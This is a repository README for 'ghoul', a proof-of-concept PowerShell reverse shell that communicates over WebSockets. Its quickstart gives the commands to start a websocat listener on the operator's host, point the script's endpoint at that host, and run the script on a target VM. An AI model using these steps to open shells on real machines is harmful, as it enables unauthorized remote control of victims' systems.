Files
ghoul/README.md
Himadri Bhattacharjee 3fff544362 feat: added demo
2023-09-09 11:16:53 +05:30

604 B

ghoul

Powershell reverse shell via WebSockets

Important

The code in this repository is a proof of concept. The end user is solely liable for their actions. Read the license for more details.

Demo

Prerequisites

Quickstart

On the host machine, spin up a listener.

websocat -s 42069 -b

In ghoul.ps1, change the IP address for the $endpoint variable to your host's IP address. Now run it in the VM.

.\ghoul.ps1